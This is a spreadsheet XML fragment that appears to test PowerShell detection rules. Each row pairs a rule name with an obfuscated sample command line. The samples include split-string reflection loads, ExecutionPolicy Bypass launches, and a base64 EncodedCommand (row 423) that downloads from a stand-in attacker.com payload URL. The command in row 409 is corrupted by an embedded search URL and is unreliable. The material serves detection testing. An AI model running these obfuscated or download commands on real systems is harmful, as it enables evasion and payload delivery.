          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E402" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$m = 'Load'; [Reflection.Assembly]::$m.Invoke($data)"</t>
        </is>
      </c>
      <c r="F402" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G402" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H402" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I402" s="43" t="n"/>
      <c r="J402" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K402" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="403" ht="15.75" customHeight="1" s="42">
      <c r="A403" s="43" t="n"/>
      <c r="B403" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C403" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D403" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E403" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "[Reflection.Assembly]::('L'+'o'+'ad').Invoke($data)"</t>
        </is>
      </c>
      <c r="F403" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G403" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H403" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I403" s="44" t="n"/>
      <c r="J403" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K403" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="404" ht="15.75" customHeight="1" s="42">
      <c r="A404" s="43" t="n"/>
      <c r="B404" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C404" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D404" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E404" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Reflection.Assembly]::(\"{1}{0}\" -f 'oad','L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F404" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G404" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H404" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I404" s="44" t="n"/>
      <c r="J404" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K404" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="405" ht="15.75" customHeight="1" s="42">
      <c r="A405" s="43" t="n"/>
      <c r="B405" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C405" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D405" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E405" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F405" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G405" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H405" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I405" s="44" t="n"/>
      <c r="J405" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K405" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="406" ht="15.75" customHeight="1" s="42">
      <c r="A406" s="43" t="n"/>
      <c r="B406" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_reflection_assembly_load_obfusc</t>
        </is>
      </c>
      <c r="C406" s="44" t="inlineStr">
        <is>
          <t>Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call</t>
        </is>
      </c>
      <c r="D406" s="44" t="inlineStr">
        <is>
          <t>9c0295ce-d60d-40bd-bd74-84673b7592b1</t>
        </is>
      </c>
      <c r="E406" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMANd "[Reflection.Assembly]::(\" {1}{0}\" -F 'oad' ,'L').Invoke($data)"</t>
        </is>
      </c>
      <c r="F406" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G406" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H406" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I406" s="43" t="n"/>
      <c r="J406" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K406" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="407" ht="15.75" customHeight="1" s="42">
      <c r="A407" s="43" t="n"/>
      <c r="B407" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C407" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D407" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E407" s="44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F407" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G407" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H407" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I407" s="44" t="n"/>
      <c r="J407" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K407" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="408" ht="15.75" customHeight="1" s="42">
      <c r="A408" s="43" t="n"/>
      <c r="B408" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C408" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D408" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E408" s="44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408" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G408" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H408" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I408" s="44" t="n"/>
      <c r="J408" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K408" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="409" ht="15.75" customHeight="1" s="42">
      <c r="A409" s="43" t="n"/>
      <c r="B409" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C409" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D409" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E409" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F409" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G409" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H409" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I409" s="43" t="n"/>
      <c r="J409" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K409" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="410" ht="15.75" customHeight="1" s="42">
      <c r="A410" s="43" t="n"/>
      <c r="B410" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C410" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D410" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E410" s="44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410" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G410" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H410" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I410" s="43" t="n"/>
      <c r="J410" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K410" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="411" ht="15.75" customHeight="1" s="42">
      <c r="A411" s="43" t="n"/>
      <c r="B411" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C411" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D411" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E411" s="44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411" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G411" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H411" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I411" s="43" t="n"/>
      <c r="J411" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K411" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="412" ht="15.75" customHeight="1" s="42">
      <c r="A412" s="43" t="n"/>
      <c r="B412" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C412" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D412" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E412" s="44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412" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G412" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H412" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I412" s="43" t="n"/>
      <c r="J412" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K412" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="413" ht="15.75" customHeight="1" s="42">
      <c r="A413" s="43" t="n"/>
      <c r="B413" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C413" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D413" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E413" s="44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F413" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G413" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H413" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I413" s="44" t="n"/>
      <c r="J413" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K413" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="414" ht="15.75" customHeight="1" s="42">
      <c r="A414" s="43" t="n"/>
      <c r="B414" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C414" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D414" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E414" s="44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F414" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G414" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H414" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I414" s="44" t="n"/>
      <c r="J414" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K414" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="415" ht="15.75" customHeight="1" s="42">
      <c r="A415" s="43" t="n"/>
      <c r="B415" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C415" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D415" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E415" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncodedCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F415" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G415" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H415" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I415" s="44" t="n"/>
      <c r="J415" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K415" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="416" ht="15.75" customHeight="1" s="42">
      <c r="A416" s="43" t="n"/>
      <c r="B416" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C416" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D416" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E416" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"EncodedCommand" Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F416" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G416" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H416" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I416" s="44" t="n"/>
      <c r="J416" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K416" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="417" ht="15.75" customHeight="1" s="42">
      <c r="A417" s="43" t="n"/>
      <c r="B417" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C417" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D417" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E417" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -EncODEDCommand Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F417" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G417" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H417" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I417" s="43" t="n"/>
      <c r="J417" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K417" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="418" ht="15.75" customHeight="1" s="42">
      <c r="A418" s="43" t="n"/>
      <c r="B418" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C418" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D418" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E418" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eNcodEDCOmManD Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F418" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G418" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H418" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I418" s="43" t="n"/>
      <c r="J418" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K418" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="419" ht="15.75" customHeight="1" s="42">
      <c r="A419" s="43" t="n"/>
      <c r="B419" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C419" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D419" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E419" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -enc Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F419" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G419" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H419" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I419" s="44" t="n"/>
      <c r="J419" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K419" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="420" ht="15.75" customHeight="1" s="42">
      <c r="A420" s="43" t="n"/>
      <c r="B420" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C420" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D420" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E420" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ENcoDedcomMaND Q29udmVydFRvLVNlY3VyZVN0cmluZyAtU3RyaW5nICdQYXNzd29yZCcgLUFzUGxhaW5UZXh0IC1Gb3JjZQ==</t>
        </is>
      </c>
      <c r="F420" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G420" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H420" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I420" s="44" t="n"/>
      <c r="J420" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K420" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="421" ht="15.75" customHeight="1" s="42">
      <c r="A421" s="43" t="n"/>
      <c r="B421" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C421" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D421" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E421" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F421" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G421" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H421" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I421" s="43" t="n"/>
      <c r="J421" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K421" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="422" ht="15.75" customHeight="1" s="42">
      <c r="A422" s="43" t="n"/>
      <c r="B422" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C422" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D422" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E422" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F422" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G422" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H422" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I422" s="43" t="n"/>
      <c r="J422" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K422" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="423" ht="15.75" customHeight="1" s="42">
      <c r="A423" s="43" t="n"/>
      <c r="B423" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C423" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D423" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E423" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"EncodedCommand" SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwADoALwAvAGEAdAB0AGEAYwBrAGUAcgAuAGMAbwBtAC8AcABhAHkAbABvAGEAZAAiAA==</t>
        </is>
      </c>
      <c r="F423" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G423" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H423" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I423" s="44" t="n"/>
      <c r="J423" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K423" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="424" ht="15.75" customHeight="1" s="42">
      <c r="A424" s="43" t="n"/>
      <c r="B424" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C424" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D424" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E424" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -FilE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F424" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G424" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H424" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I424" s="43" t="n"/>
      <c r="J424" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K424" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="425" ht="15.75" customHeight="1" s="42">
      <c r="A425" s="43" t="n"/>
      <c r="B425" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C425" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D425" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E425" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -f C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F425" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G425" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H425" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I425" s="43" t="n"/>
      <c r="J425" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K425" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="426" ht="15.75" customHeight="1" s="42">
      <c r="A426" s="43" t="n"/>
      <c r="B426" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_reversed_strings</t>
        </is>
      </c>
      <c r="C426" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Obfuscation Via Reversed Commands</t>
        </is>
      </c>
      <c r="D426" s="44" t="inlineStr">
        <is>
          <t>b6b49cd1-34d6-4ead-b1bf-176e9edba9a4</t>
        </is>
      </c>
      <c r="E426" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"ExecutionPolicy" Bypass -fiLE C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F426" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G426" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H426" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I426" s="43" t="n"/>
      <c r="J426" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K426" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="427" ht="15.75" customHeight="1" s="42">
      <c r="A427" s="43" t="n"/>
      <c r="B427" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C427" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D427" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E427" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCUTIonPolICy Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F427" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G427" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H427" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I427" s="44" t="n"/>
      <c r="J427" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K427" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="428" ht="15.75" customHeight="1" s="42">
      <c r="A428" s="43" t="n"/>
      <c r="B428" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C428" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D428" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E428" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -"File" C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F428" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G428" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H428" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I428" s="43" t="n"/>
      <c r="J428" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K428" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="429" ht="15.75" customHeight="1" s="42">
      <c r="A429" s="43" t="n"/>
      <c r="B429" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C429" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D429" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E429" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -"ExecutionPolicy" Bypass -File C:\Users\Public\script.ps1</t>
        </is>
      </c>
      <c r="F429" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G429" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H429" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I429" s="44" t="n"/>
      <c r="J429" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K429" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="430" ht="15.75" customHeight="1" s="42">
      <c r="A430" s="43" t="n"/>
      <c r="B430" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_special_characters</t>
        </is>
      </c>
      <c r="C430" s="44" t="inlineStr">
        <is>
          <t>Potential PowerShell Command Line Obfuscation</t>
        </is>
      </c>
      <c r="D430" s="44" t="inlineStr">
        <is>
          <t>d7bcd677-645d-4691-a8d4-7a5602b780d1</t>
        </is>
      </c>
      <c r="E430" s="44" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "&amp; ( '{0}{1}{2}' -f 'I','EX','' ) ('Wri'+'te-H'+'ost ''Bypass''')"</t>
        </is>
      </c>
      <c r="F430" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G430" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H430" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I430" s="43" t="n"/>
      <c r="J430" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K430" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="431" ht="15.75" customHeight="1" s="42">
      <c r="A431" s="43" t="n"/>
      <c r="B431" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_comobject_msi</t>
        </is>
      </c>
      <c r="C431" s="44" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell MSI Install via WindowsInstaller COM</t>
        </is>
      </c>
      <c r="D431" s="44" t="inlineStr">
        <is>
          <t>7b6a7418-3afc-11f0-aff4-000d3abf478c</t>
        </is>
      </c>
      <c r="E431" s="4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1" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G431" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H431" s="44" t="b">
        <v>0</v>
      </c>
